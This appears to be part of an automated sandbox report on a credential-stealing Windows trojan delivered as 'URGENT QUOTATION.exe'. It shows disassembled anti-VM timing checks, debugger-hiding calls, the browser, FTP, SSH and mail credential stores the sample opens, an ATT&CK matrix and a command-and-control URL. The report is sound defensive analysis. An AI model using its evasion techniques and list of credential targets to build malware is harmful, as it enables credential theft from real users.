            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802CD push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021852CD push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802C3 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021852F9 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802F3 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOX

            Malware Analysis System Evasion:

            barindex
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: URGENT QUOTATION.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218524C second address: 000000000218524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000056524C second address: 000000000056524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000000564C8B second address: 0000000000564C8B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor word ptr [eax+ebx], cx 0x0000000f cmp ebx, 0000033Dh 0x00000015 jnl 00007F270CB2D94Bh 0x00000017 add ebx, 02h 0x0000001a jmp 00007F270CB2D8FCh 0x0000001c jmp 00007F270CB2D946h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021853EC rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6884Thread sleep count: 91 > 30
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6660Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeLast function: Thread delayed
            Source: URGENT QUOTATION.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Contains functionality to hide a thread from the debuggerShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218613D NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021853EC rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021830FC LdrInitializeThunk,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182BF7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218182B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021846D2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021846D7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181F7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181F7D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218578B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218578F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021857AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181FAF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021857C9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021857E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181D7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02184DA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02184DA3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00564DA3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00564DA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005646D7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005646D2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005657C9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562BF3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005657E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562BE1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056578F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056578B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005657AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180701 cpuid
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Masquerading1OS Credential Dumping2Security Software Discovery621Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22Credentials in Registry1Virtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Information Discovery213Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            URGENT QUOTATION.exe29%VirustotalBrowse
            URGENT QUOTATION.exe48%ReversingLabsWin32.Trojan.Vebzenpak
            URGENT QUOTATION.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://51.195.53.221/p.php/594QbwaP456AN11%VirustotalBrowse
            http://51.195.53.221/p.php/594QbwaP456AN0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            onedrive.live.com
            unknown
            unknownfalse
              high
              gnpnew.by.files.1drv.com
              unknown
              unknownfalse
                high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://51.195.53.221/p.php/594QbwaP456ANtrue
                • 11%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://onedrive.live.com/download?cid=604AA6C584DB9137&resid=604AA6C584DB9137%21123&authkey=ANCFnepURGENT QUOTATION.exe, 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  51.195.53.221
                  unknownFrance
                  16276OVHFRtrue

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:356236
                  Start date:22.02.2021
                  Start time:19:54:12
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 42s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:URGENT QUOTATION.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/2@2/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 3.6% (good quality ratio 3.5%)
                  • Quality average: 59.9%
                  • Quality standard deviation: 16.7%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated
                  Warnings:
                  Show All
